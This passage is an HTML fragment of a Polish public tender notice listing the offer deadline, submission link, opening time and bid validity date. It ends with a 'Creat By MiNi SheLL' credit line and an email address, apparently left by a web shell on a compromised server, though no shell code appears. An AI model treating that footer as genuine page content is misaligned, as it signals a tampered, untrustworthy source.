PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-864d5fa1-0b54-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com